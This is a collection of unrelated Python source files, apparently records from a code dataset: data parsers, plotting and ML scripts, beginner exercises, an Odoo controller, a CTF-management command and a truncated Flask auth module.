+{"seq_id":"253535132","text":"import sys, json\n\n# Path to the monster json file.\nfilename = sys.argv[-1]\n\nwith open(filename, 'r') as data_file:\n    data = json.load(data_file)\n\n# We don't really need to care about the monster/creature objects themselves as\n# the API POST /monster endpoint can set these up just fine (minus licence at end).\n\nMonsters, Creatures, CreatureActions = [], [], []\n\n# just match on this key for now. At least it's better than using a hard-coded id from the db.\ncreatureActionTypes = {\"actions\", \"reactions\", \"legendary_actions\", \"special_abilities\"}\n\nMonsterID = 1\n\nfor eachMonster in data:\n    if 'license' in eachMonster:\n        continue\n\n    # Create n creature action rows\n    for actionSetType in creatureActionTypes:\n        if actionSetType in eachMonster.keys():\n            for action in eachMonster[actionSetType]:\n\n                for eachKey in action.keys():\n                    if len(str(eachKey)) < 1:\n                        action[eachKey] = None\n\n                CreatureActions.append({\n                    \"creature_action_type_name\" : actionSetType,\n                    \"creature_id\" : MonsterID,\n                    \"name\" : action['name'] if 'name' in action else None,\n                    \"desc\" : action['desc'] if 'desc' in action else None,\n                    \"attack_bonus\" : action['attack_bonus'] if 'attack_bonus' in action else None,\n                    \"damage_dice\" : action['damage_dice'] if 'damage_dice' in action else None,\n                    \"damage_bonus\" : action['damage_bonus'] if 'damage_bonus' in action else None,\n                    \"official\" : True\n                })\n\n    MonsterID += 1\n\n# stdout pipe to file -> curl to POST /api/creature-actions etc.\nprint(json.dumps(CreatureActions))\n","sub_path":"src/bin/adhoc/parse-monster-actions.py","file_name":"parse-monster-actions.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"349538956","text":"# allennlp evaluate /path/to/model.tar.gz --evaluation-data-file (https://s3-us-west-1.amazonaws.com/handsomezebra/public/Quora_question_pair_partition.zip)#Quora_question_pair_partition/test.tsv\n\nimport sys\nimport logging\nimport glob\nimport os\n\nfrom allennlp.commands import main\n\n# getting the last updated model\nfiles = list(filter(os.path.isfile, glob.glob(\"./output_*/model.tar.gz\")))\nfiles.sort(key=lambda x: os.path.getmtime(x))\nmodel_path = files[-1]\n\ntest_path = \"./tests/quora_test_sample.txt\"\n\n# Assemble the command into sys.argv\nsys.argv = [\n    \"allennlp\", # command name, not used by main\n    \"predict\",\n    model_path,\n    test_path,\n    \"--include-package\", \"hznlp\",\n    \"--predictor\", \"sentence_pair\",\n    \"--cuda-device\", \"-1\"\n]\n\nlogging.basicConfig(level=logging.INFO)\n\nmain()","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"371639713","text":"#Code by Shreyank #Github-https://github.com/Shreyankkarjigi\n#problem\n'''\nWap to make a new string with the word \"The\" removed from the 
string\n\n\"This is the lion in the cage\"\n\n'''\n\nstring=\"This is the lion in the cage\"\n\n#safe side convert the string to lowercase\nstring.lower()\n#use replace function\nstring_new=string.replace(\"the\",\"\")\n\n#print the new string\n\nprint(string_new)\n\n\n\n'''\noutput\n\nThis is lion in cage\n'''","sub_path":"Problems on Strings/Wap to make a new string with the word removed from the string.py","file_name":"Wap to make a new string with the word removed from the string.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"390493495","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nfrom __future__ import division, print_function\n\nimport math\nimport random\n\nimport numpy\n\n\nclass Bitmap(object):\n def __init__(self, size, bitwidth=32, array=None, members=None):\n \"\"\"\n :param size: number of bits\n :param bitwidth:\n :param array:\n :param members:\n :return:\n \"\"\"\n self.size = int(math.ceil(size))\n self.bitwidth = bitwidth\n if array is None:\n dtype = 'uint{}'.format(bitwidth)\n arrsize = int(numpy.ceil(size * 1. / bitwidth))\n self.array = numpy.zeros(arrsize, dtype=dtype)\n else:\n self.array = array\n if members:\n self.update(members)\n\n def _verify(self, bitmap):\n if self.size != bitmap.size:\n raise ValueError('cannot use a bitmap of different size')\n if self.bitwidth != bitmap.bitwidth:\n raise ValueError('cannot use a bitmap of different bitwidth')\n\n def add(self, integer):\n idx = int(integer / self.bitwidth)\n self.array[idx] |= 1 << (integer % self.bitwidth)\n\n def __contains__(self, integer):\n idx = int(integer / self.bitwidth)\n return self.array[idx] & (1 << (integer % self.bitwidth))\n\n def update(self, collection):\n if isinstance(collection, Bitmap):\n self._verify(collection)\n self.array |= collection.array\n return\n for integer in collection:\n self.add(integer)\n\n def union(self, collction):\n this = self.copy()\n this.update(collction)\n return this\n\n def intersection_update(self, collection):\n if not isinstance(collection, Bitmap):\n that = self.metacopy()\n that.update(collection)\n else:\n that = collection\n self.array &= that.array\n\n def intersection(self, collection):\n this = self.copy()\n this.intersection_update(collection)\n return this\n\n def difference_update(self, collection):\n if not isinstance(collection, Bitmap):\n that = self.metacopy()\n that.update(collection)\n else:\n that = collection\n self.intersection_update(-that)\n\n def difference(self, collection):\n this = self.copy()\n this.difference_update(collection)\n return this\n\n def clear(self):\n self.array[:] = 0\n return self\n\n def copy(self):\n array = self.array.copy()\n return Bitmap(self.size, self.bitwidth, array=array)\n\n def metacopy(self):\n array = numpy.zeros_like(self.array)\n return Bitmap(self.size, self.bitwidth, array=array)\n\n def __neg__(self):\n array = ~ self.array\n return Bitmap(self.size, self.bitwidth, array=array)\n\n def __iter__(self):\n for plane in self._iter_bit_planes(False):\n for i in plane:\n yield i\n\n def get_members(self, count=None, random_start=False):\n members = []\n for plane in self._iter_bit_planes(random_start):\n members.extend(plane)\n if len(members) >= count:\n break\n return members\n\n def pick(self):\n for plane in self._iter_bit_planes(random_start=True):\n members = plane.tolist()\n if members:\n return random.choice(members)\n\n def _iter_bit_planes(self, random_start):\n start = 
random.randrange(self.bitwidth) if random_start else 0\n        for j in [(i + start) % self.bitwidth for i in range(self.bitwidth)]:\n            for arr in numpy.nonzero(self.array & numpy.array([1 << j])):\n                # arr: indexes with bit 1 on j-th bit\n                yield numpy.array([j]) + arr * self.bitwidth\n\n    @classmethod\n    def test_bitmap(cls):\n        bm = cls(1001)\n        items = [1, 34, 555, 90]\n        for i in range(1001):\n            assert i not in bm\n        bm.update(items)\n        for i in range(1001):\n            if i in items:\n                assert i in bm\n            else:\n                assert i not in bm\n        return bm\n","sub_path":"joker/binary/bitmap.py","file_name":"bitmap.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"581838674","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport plotly\n\nfrom plotly.subplots import make_subplots\n\nplotly.__version__\n\n\n# ***See Returns.ipynb for an example of using plotly with pandas Series and DataFrames***\n\n# ***Reading https://plot.ly/python/creating-and-updating-figures/ is worthwhile***\n\n# ## Simple example\n\n# In[2]:\n\n\nimport plotly\nimport plotly.graph_objs as go\n\n\ntrace0 = go.Scatter(\n    x=[1, 2, 3, 4],\n    y=[10, 15, 13, 17]\n)\ntrace1 = go.Scatter(\n    x=[1, 2, 3, 4],\n    y=[16, 5, 11, 9]\n)\ndata = [trace0, trace1]\n\ngo.Figure(data).show()\n\n\n# ## Wrapping matplotlib\n\n# In[3]:\n\n\n\n\n# Matplotlib\nimport matplotlib.pyplot as plt\nimport plotly.tools as tls\n\n## Generating the data..\nx = np.linspace(-2*np.pi, 2*np.pi, 1000)\n\n\nfig = plt.figure() # Initiate a figure\n\na1 = fig.add_subplot(221) # Figure has 2 rows and 2 columns; choose the first subplot\na1.plot(x,np.sin(x)) # Plot x and y in the chosen subplot\na1.grid()\n\na2 = fig.add_subplot(224)\na2.plot(x,np.cos(x))\na2.grid()\n\n\n# In[4]:\n\n\n# Now we make the matplotlib figure interactive using plotly\n\nplotly_fig = tls.mpl_to_plotly(fig)\n\nplotly_fig.show()\n\n\n# ## Plotting columns of a DataFrame\n\n# In[5]:\n\n\ndef PlotData(df):\n    pdata = [{'x':df.index,'y':df[col],'name':col} for col in df.columns]\n    return(pdata)\n\n\n# In[6]:\n\n\nETFRets = pd.read_pickle('/home/vpoduri/Site/ETFRets.pkl')\nETFRets.head()\n\n\n# In[7]:\n\n\n# Plotting\npdata = PlotData(ETFRets)\nlayout = go.Layout(title = 'ETF Returns',yaxis=dict(tickformat='.1%',title='Return'))\n\npFig = go.Figure(pdata,layout) # creates a Figure object\npFig.show()\n\n\n# ## Elaborate subplots\n\n# In[8]:\n\n\n# Rolling Correlations\nRCorr = ETFRets.rolling(12).corr(pairwise=True) # Really nice syntax!\n\nnr = 2 ; nc = 4\nfig = make_subplots(rows=nr, cols=nc, start_cell=\"top-left\",\n                   subplot_titles=list(RCorr.columns))\n\n\n# In[9]:\n\n\nfoo = RCorr.reset_index().rename(columns={\"level_1\":\"ETF\"})\nfoo.head(10)\n\n\n# In[10]:\n\n\n# Visualization with subplots. 
Quite finicky.\nETFList = foo.columns[2:]\n\nfor j in range(len(ETFList)):\n ticker = ETFList[j]\n df1 = foo.loc[foo[\"ETF\"]==ticker,:]\n df1 = df1.drop(columns=[\"ETF\",ticker]) # All values are 1\n \n fr,fc = np.unravel_index(j,(nr,nc),order='F') # Calculates subplot index, Fortran style (column major order)\n \n plines = [go.Scatter(x=df1[\"Date\"],y=df1[col],name=col) for col in ETFList.difference([ticker])]\n _=[fig.append_trace(pl,row=int(fr+1),col=int(fc+1)) for pl in plines]\n \n # only append_trace seems to do the trick with subplots\n # np.int64 for row and col cause errors, so have to use int\n \nfig.show()\n\n\n# ## plotly express\n\n# Plotly express was inspired by ggplot and Seaborn. It is a wrapper around lower-level classes and methods. It works best if the data are in a long form DataFrame. \n# \n# See its [tutorial](https://plot.ly/python/plotly-express/) for details.\n\n# In[11]:\n\n\nimport plotly.express as px\n\nRC2 = RCorr.reset_index().rename(columns={'level_1':'ETF'})\nRC2 = pd.melt(RC2,id_vars=['Date','ETF'],var_name='With',value_name='Corr')\n\npx.line(RC2,x='Date',y='Corr',color='With',facet_col='ETF',facet_col_wrap=4) # Remarkably elegant\n\n\n# In[48]:\n\n\nRC2.head()\n\n","sub_path":"Using_plotly.py","file_name":"Using_plotly.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"93692685","text":"import numpy as np\r\nimport sys\r\nimport os\r\n\r\nclass policy_iteration:\r\n def __init__(self, environment, max_iter=None):\r\n self.envonment = environment\r\n if max_iter is None:\r\n self.max_iter = np.iinfo(np.int32).max\r\n else:\r\n self.max_iter = max_iter\r\n self.d_idx = None\r\n self.V = np.zeros(len(self.envonment.states))\r\n self.total_iter = 0\r\n\r\n def get_optimal_policy(self):\r\n return self.envonment.get_policy(self.envonment.policies[self.d_idx])\r\n\r\n def evaluate_policy(self):\r\n print('[policy evaluation]')\r\n if self.d_idx is None:\r\n self.d_idx = 0\r\n policy = self.envonment.policies[self.d_idx]\r\n I = np.eye(len(self.envonment.states))\r\n transition_prob = self.envonment.get_transition_prob(policy)\r\n self.V = np.linalg.inv(I - self.envonment.discount_factor * transition_prob)\r\n self.V = np.matmul(self.V, self.envonment.get_reward(policy))\r\n print('V:', self.V, end='\\n\\n')\r\n\r\n def improve_policy(self):\r\n print('[policy improvement]')\r\n values = []\r\n for i, policy in enumerate(self.envonment.policies):\r\n values.append(list(self.envonment.get_reward(policy) + self.envonment.discount_factor * np.matmul(self.envonment.get_transition_prob(policy), self.V)))\r\n self.d_idx = np.argmax(np.sum(values, axis=-1))\r\n print('values:', values, '\\n' +\\\r\n 'new policy:', self.envonment.get_policy(self.envonment.policies[self.d_idx]), end='\\n\\n')\r\n\r\n def fit(self, verbose=True):\r\n if verbose is False:\r\n temp = sys.stdout\r\n sys.stdout = open(os.devnull, 'w')\r\n for i in range(self.max_iter):\r\n print('[iter ' + str(i) + ']')\r\n self.total_iter = i\r\n prev_idx = self.d_idx\r\n self.evaluate_policy()\r\n self.improve_policy()\r\n if prev_idx == self.d_idx:\r\n print('[converged]')\r\n break\r\n if verbose is False:\r\n sys.stdout = temp\r\n","sub_path":"algorithms/policy_iteration.py","file_name":"policy_iteration.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"195124558","text":"# -*- coding: utf-8 -*-\nfrom 
__future__ import division\n\nn=input('Enter n: ')\n\nl=[]\n\n#LIST\nfor i in range(0,n,1):\n    l.append(input('Enter an element: '))\n    \n#FIRSTandLAST \nprint('%.2f' %l[0])\nprint('%.2f' %(l[len(l)-1]))\n\n#AVERAGE\nsoma=0\n\nfor i in range(0,n,1):\n    soma=(soma+l[i])\n    \nmedia=((soma)/(len(l)))\nprint('%.2f' %media)\n\n#LIST\nprint(l)\n    \n","sub_path":"moodledata/vpl_data/43/usersdata/65/14278/submittedfiles/mediaLista.py","file_name":"mediaLista.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"176328485","text":"from py_irt.initializers import DifficultySignInitializer\nfrom py_irt.dataset import Dataset\nfrom py_irt.training import IrtModelTrainer\nfrom py_irt.config import IrtConfig\n\n\ndef test_parsing():\n    config = IrtConfig(model_type=\"4pl\", initializers=[])\n    # This loads the initializer, so is a fine test\n    trainer = IrtModelTrainer(data_path=\"test_fixtures/minitest.jsonlines\", config=config)\n    assert len(trainer._initializers) == 0\n\n    config = IrtConfig(model_type=\"4pl\", initializers=[\"difficulty_sign\"])\n    trainer = IrtModelTrainer(data_path=\"test_fixtures/minitest.jsonlines\", config=config)\n    assert len(trainer._initializers) == 1\n    assert isinstance(trainer._initializers[0], DifficultySignInitializer)\n\n    config = IrtConfig(\n        model_type=\"4pl\", initializers=[{\"name\": \"difficulty_sign\", \"magnitude\": 5.0}]\n    )\n    trainer = IrtModelTrainer(data_path=\"test_fixtures/minitest.jsonlines\", config=config)\n    assert len(trainer._initializers) == 1\n    assert isinstance(trainer._initializers[0], DifficultySignInitializer)\n    assert trainer._initializers[0]._magnitude == 5.0\n","sub_path":"tests/test_initializer.py","file_name":"test_initializer.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"589961943","text":"import board\nimport terminalio\nimport displayio\nimport math\nimport time\nimport rtc\nfrom adafruit_st7789 import ST7789\nimport network\n\n# Release any resources currently in use for the displays\ndisplayio.release_displays()\n\nspi = board.SPI()\ntft_cs = board.IO13\ntft_dc = board.IO14\n\ndisplay_bus = displayio.FourWire(\n    spi, command=tft_dc, chip_select=tft_cs, reset=board.IO15)\ndisplay = ST7789(display_bus, width=320, height=240, rotation=90)\n\nmynet = network.Network()\nmynet.syncRTC_time()\n\n# Open the files\n# Setup the file as the bitmap data source\nzero = open(\"/zero.bmp\", \"rb\")\none = open(\"/one.bmp\", \"rb\")\ntwo = open(\"/two.bmp\", \"rb\")\nthree = open(\"/three.bmp\", \"rb\")\nfour = open(\"/four.bmp\", \"rb\")\nfive = open(\"/five.bmp\", \"rb\")\nsix = open(\"/six.bmp\", \"rb\")\nseven = open(\"/seven.bmp\", \"rb\")\neight = open(\"/eight.bmp\", \"rb\")\nnine = open(\"/nine.bmp\", \"rb\")\n\n\nclass numbers:\t\n    def __init__(self, val, name):\n        self.fname = name\n        self.width = val\n        self.file = displayio.OnDiskBitmap(name)\n    \n    def get_name(self):\n        return self.fname\t\n    \n    def get_width(self):\n        return self.width\n    \n    def get_file(self):\n        return self.file\n    \n\ndef pickSprite(num, dig, width):\n    sprite = displayio.TileGrid(num, pixel_shader=displayio.ColorConverter(),\n                                width = 1,\n                                height = 1,\n                                tile_width = width,\n                                tile_height = 224,\n                                default_tile = 0,x=dig, y=0)\n    return sprite\n    \n\ndef truncate(n, decimals=0):\n    multiplier = 10 ** decimals\n    return math.floor(int(n * multiplier) / multiplier)\n    \n\n    \nzero = numbers(157, 
zero)\none = numbers(150, one)\ntwo = numbers(155, two)\nthree = numbers(158, three)\nfour = numbers(152, four)\nfive = numbers(153, five)\nsix = numbers(156, six)\nseven = numbers(160, seven)\neight = numbers(160, eight)\nnine = numbers(148, nine)\n\n\nboardRTC = rtc.RTC()\n\n# Main Loop\nwhile True:\n display.refresh()\n clockTime = boardRTC.datetime\n \n fdig = clockTime.tm_min % 10\n sdig = truncate(clockTime.tm_min / 10)\n\n\n # Create a Group to hold the TileGrid\n group = displayio.Group()\n \n if fdig == 0:\n group.append(pickSprite(zero.get_file(), 160, zero.get_width()))\n \n if fdig == 1:\n group.append(pickSprite(one.get_file(), 160, one.get_width()))\n \n if fdig == 2:\n group.append(pickSprite(two.get_file(), 160, two.get_width()))\n \n if fdig == 3:\n group.append(pickSprite(three.get_file(), 160, three.get_width()))\n \n if fdig == 4:\n group.append(pickSprite(four.get_file(), 160, four.get_width()))\n\n if fdig == 5:\n group.append(pickSprite(five.get_file(), 160, five.get_width()))\n \n if fdig == 6:\n group.append(pickSprite(six.get_file(), 160, six.get_width()))\n \n if fdig == 7:\n group.append(pickSprite(seven.get_file(), 160, seven.get_width()))\n \n if fdig == 8:\n group.append(pickSprite(eight.get_file(), 160, eight.get_width()))\n \n if fdig == 9:\n group.append(pickSprite(nine.get_file(), 160, nine.get_width()))\n \n \n if sdig == 0:\n group.append(pickSprite(zero.get_file(), 0, zero.get_width()))\n \n if sdig == 1:\n group.append(pickSprite(one.get_file(), 0, one.get_width()))\n \n if sdig == 2:\n group.append(pickSprite(two.get_file(), 0, two.get_width()))\n \n if sdig == 3:\n group.append(pickSprite(three.get_file(), 0, three.get_width()))\n \n if sdig == 4:\n group.append(pickSprite(four.get_file(), 0, four.get_width()))\n\n if sdig == 5:\n group.append(pickSprite(five.get_file(), 0, five.get_width()))\n \n if sdig == 6:\n group.append(pickSprite(six.get_file(), 0, six.get_width()))\n \n if sdig == 7:\n group.append(pickSprite(seven.get_file(), 0, seven.get_width()))\n \n if sdig == 8:\n group.append(pickSprite(eight.get_file(), 0, eight.get_width()))\n \n if sdig == 9:\n group.append(pickSprite(nine.get_file(), 0, nine.get_width()))\n\n # Add the Group to the Display\n display.show(group)\n\n \n \n","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"93102003","text":"import random\n\nrandom_number = random.randint(1, 100)\nprint(random_number)\n\ntakes = 7\n\nprint(\"Guess the number from 1 to 100, you have 7 takes!\")\n\nwhile takes > 0:\n\n takes -= 1\n guess = int(input(\"Your number: \"))\n\n if random_number == guess:\n print(\"You're god damn right!\")\n break\n\n else:\n\n if random_number > guess:\n print(\"Number too low\")\n else:\n print(\"Number too high\")\n\n print(\"Loser!\")\n","sub_path":"number.py","file_name":"number.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"465142385","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom store_json import store_json\nimport sys\nimport os\nsys.path.append('../')\nfrom configuration import set_data_path\n\n\ndef localblacklist():\n\tdata_path = set_data_path()\n\tblacklist_dir = os.path.join(data_path,'local_Blacklist.txt')\n\twith open(blacklist_dir,'r') as f:\n\t\ttext = f.read()\n\ttext = text.split('\\n')[6:-1]\n\tret_dict = {}\n\tfor row in text:\n\t\trow 
= row.split(' ')\n\t\tret_dict[row[0]] = {\n\t\t\t'source' : row[1],\n\t\t\t'subtype' : row[2]\n\t\t}\n\treturn ret_dict\n\ndef main():\n\tret_dict = localblacklist()\n\tstore_json(ret_dict,'localblacklist')\n\n","sub_path":"project/get_blacklist/localblacklist.py","file_name":"localblacklist.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"1682376","text":"\nimport cv2 as cv\nimport numpy as np\nimport cv2\n# read in the image\n\n# convert to grayscale\ndef find_picture_location(frame):\n    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n    # binarize\n    ret, thresh = cv2.threshold(gray, 30, 255, cv2.THRESH_BINARY_INV)\n    rows_index = np.nonzero(thresh)[0]\n    cols_index = np.nonzero(thresh)[1] \n    top,bottom = np.min(rows_index),np.max(rows_index)\n    left,right = np.min(cols_index),np.max(cols_index)\n    return (left,top),(right,bottom)\n    # rec = cv2.rectangle(src,(left,top),(right,bottom),(255,0,0),2)\n    # cv2.imshow(\"ff\",rec)\n    # cv2.waitKey(3000)\n\ndef get_red_region(frame):\n    # obtain user draw region -- default is blue\n    img = frame\n    hsv = cv2.cvtColor(src, cv2.COLOR_BGR2HSV)\n    # need to modify\n    low_blue = np.array([100,43,46])\n    high_blue = np.array([124,255,255])\n    mask = cv2.inRange(hsv,low_blue,high_blue)\n    mask_inv = cv2.bitwise_not(mask)\n    contours, hierarchy = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n    cnt = contours[1]\n    # print(\"cnt is: \",cnt,type(cnt),cnt.shape)\n    left = cnt[0][0][0]\n    top = cnt[0][0][1]\n    right = cnt[2][0][0]\n    bottom = cnt[4][0][1]\n    # img = cv2.rectangle(img,(left,top),(right,bottom),(255,255,0),2)\n    # cv2.drawContours(img,[cnt],0,(0,255,0),3)\n    useful_frame_roi = img[top:bottom,left:right]\n    cv2.imshow(\"contours\",useful_frame_roi)\n    cv2.waitKey(3000)\n\ndef get_red_rect(frame,colored_frame):\n    frame = np.uint8(frame)\n    print(frame.dtype)\n    ret,thresh=cv2.threshold(frame,200,255,cv2.THRESH_BINARY)\n    contouts,h = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_NONE)\n    cnt = contouts\n    inner_x,inner_y,inner_w,inner_h = 999,999,999,999\n    board = 30\n    for i in cnt:\n        # assign bounding-box coordinates\n        x,y,w,h = cv2.boundingRect(i)\n        if w < inner_w and h < inner_h:\n            inner_x,inner_y,inner_w,inner_h = x+board,y+board,w-2*board,h-2*board\n    out = cv2.rectangle(colored_frame,(inner_x,inner_y),(inner_x+inner_w,inner_y+inner_h),(0,0,255),2)\n    cv2.imshow('out',out)\n    cv2.waitKey(0)\n\n\nif __name__ == \"__main__\":\n    src = cv2.imread('picture.png')\n    mask = cv2.imread(\"test.png\",0)\n    get_red_rect(mask,src)\n    # find_picture_location(src)\n\n    \n","sub_path":"test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"357044778","text":"import numbers\nimport numpy as np\n\nfrom sklearn.utils import check_array, check_random_state\nfrom sklearn.utils import shuffle as shuffle_\nfrom sklearn.utils.deprecation import deprecated\n\n\n@deprecated(\"Please import make_blobs directly from scikit-learn\")\ndef make_blobs(n_samples=100, n_features=2, centers=2, cluster_std=1.0,\n               center_box=(-10.0, 10.0), shuffle=True, random_state=None):\n    generator = check_random_state(random_state)\n\n    if isinstance(centers, numbers.Integral):\n        centers = generator.uniform(center_box[0], center_box[1],\n                                    size=(centers, n_features))\n        print(\"centers: \")\n        print(centers)\n    else:\n        centers = check_array(centers)\n        n_features = centers.shape[1]\n\n    if isinstance(cluster_std, numbers.Real):\n        cluster_std = 
np.ones(len(centers)) * cluster_std\n print(\"cluster_std: \")\n print(cluster_std)\n\n X = []\n y = []\n\n n_centers = centers.shape[0]\n if isinstance(n_samples, numbers.Integral):\n n_samples_per_center = [int(n_samples // n_centers)] * n_centers\n for i in range(n_samples % n_centers):\n n_samples_per_center[i] += 1\n print(\"n_samples_per_center: \")\n print(n_samples_per_center)\n else:\n n_samples_per_center = n_samples\n\n for i, (n, std) in enumerate(zip(n_samples_per_center, cluster_std)):\n X.append(centers[i] + generator.normal(scale=std,\n size=(n, n_features)))\n y += [i] * n\n\n X = np.concatenate(X)\n y = np.array(y)\n\n if shuffle:\n X, y = shuffle_(X, y, random_state=generator)\n\n return X, y\n\n\nX, y = make_blobs(centers=2, random_state=4, n_samples=30)\nprint(X)\nprint(y)","sub_path":"Chapter2/tuanhtran/testMakeBlobs.py","file_name":"testMakeBlobs.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"184146613","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# Copyright (c) 2015 be-cloud.be\n# Jerome Sonnet \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. 
If not, see <http://www.gnu.org/licenses/>.\n#\n##############################################################################\n\nimport logging\n\nfrom openerp.addons.website.models.website import slug, unslug\n\nfrom openerp import http\nfrom openerp.http import request\nfrom openerp import tools\nfrom openerp.tools.translate import _\n\n_logger = logging.getLogger(__name__)\n\nclass website_portal_school_management(http.Controller):\n\n    @http.route(['/program'], type='http', auth='public')\n    def program(self, redirect=None, **post):\n        programs = request.env['school.program'].sudo().search([('state', '=', 'published')],order=\"domain_id, cycle_id, name ASC\")\n        program_list = []\n        for program in programs:\n            program_list.append({\n                'program' : program,\n                'slug_id' : slug(program),\n            })\n        values = {\n            'program_list': program_list,\n        }\n        return request.render(\"website_school_management.program\", values)\n    \n    @http.route(['/program/<program_id>'], type='http', auth='public')\n    def program_details(self, program_id, redirect=None, **post):\n        _, program_id = unslug(program_id)\n        program = request.registry['school.program'].browse(request.cr, request.uid, program_id, context=request.context)\n        values = {\n            'program': program,\n            'slug_id' : program_id,\n        }\n        return request.render(\"website_school_management.program_details\", values)\n    \n    @http.route(['/print_program/<model(\"school.program\"):program>'], type='http', auth='public')\n    def print_program(self, program, redirect=None, **post):\n        \n        report_obj = request.registry['report']\n        cr, uid, context = request.cr, request.uid, request.context\n        reportname = 'school_management.report_program_details_content'\n        \n        pdf = report_obj.get_pdf(cr, uid, [program.id], reportname, data=None, context=None)\n        pdfhttpheaders = [('Content-Type', 'application/pdf'), ('Content-Length', len(pdf))]\n        return request.make_response(pdf, headers=pdfhttpheaders)","sub_path":"website_school_management/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"525352295","text":"# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# file: show.py\n# date: 2018-02-27\n# author: paul.dautry\n# purpose:\n#\n#\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# =============================================================================\n# IMPORTS\n# =============================================================================\nfrom termcolor import colored\nfrom mkctf.helper.formatting import TAB\nfrom mkctf.helper.formatting import dict2str\n# =============================================================================\n# FUNCTIONS\n# =============================================================================\ndef __print_chall(logger, challenge, no_color):\n    \"\"\"Prints a challenge\n\n    Arguments:\n        logger {Logger} -- [description]\n        challenge {Challenge} -- [description]\n        no_color {bool} -- [description]\n\n    Returns:\n        bool -- [description]\n    \"\"\"\n    conf = challenge.get_conf()\n    if conf is None:\n        logger.error(\"configuration missing. 
Run `mkctf configure \"\n \"-c {} -s {}`\".format(challenge.category(),\n challenge.slug()))\n return False\n\n static = ' [STANDALONE]' if conf['standalone'] else ''\n\n chall_entry = \"{t}{t}- {slug}{static}\".format(t=TAB,\n slug=challenge.slug(),\n static=static)\n if not no_color:\n color = 'green' if conf['enabled'] else 'red'\n chall_entry = colored(chall_entry, color, attrs=['bold'])\n del conf['enabled']\n\n del conf['standalone']\n del conf['category']\n del conf['slug']\n\n text = dict2str(conf).replace(\"\\n\", \"\\n{t}{t}{t}\".format(t=TAB))\n\n print(chall_entry)\n print(text[1:])\n\n return True\n\nasync def show(args, repo, logger):\n \"\"\"Shows a list of all challenges\n\n Arguments:\n args {Namespace} -- [description]\n repo {Repository} -- [description]\n logger {Logger} -- [description]\n\n Returns:\n [type] -- [description]\n \"\"\"\n found = False\n success = True\n results = {}\n category, slug = args.category, args.slug\n\n if not args.json:\n print(\"challenges:\")\n\n for cat, challenges in repo.scan(category):\n\n if not args.json:\n print(\"{}+ {}\".format(TAB, cat))\n\n results[cat] = {}\n\n for challenge in challenges:\n if slug is None or slug == challenge.slug():\n found = True\n try:\n if args.json:\n results[cat][challenge.slug()] = challenge.get_conf()\n elif not __print_chall(logger, challenge, args.no_color):\n success = False\n except Exception as e:\n logger.error(\"configuration is invalid (missing key: \"\n \"{}).\".format(e))\n success = False\n\n if not found:\n logger.warning(\"no challenge found matching given constraints.\")\n\n return results if args.json else success\n","sub_path":"mkctf/command/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"393297763","text":"# authentication class for API\n\nfrom flask_restful import Resource\nfrom flask_apispec import MethodResource, doc\nfrom flask import abort\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializer\nfrom .parsers import auth_post_parser\nfrom ...server.models import User\nfrom ...server.utils import Permission\n\n\n################\n#### view 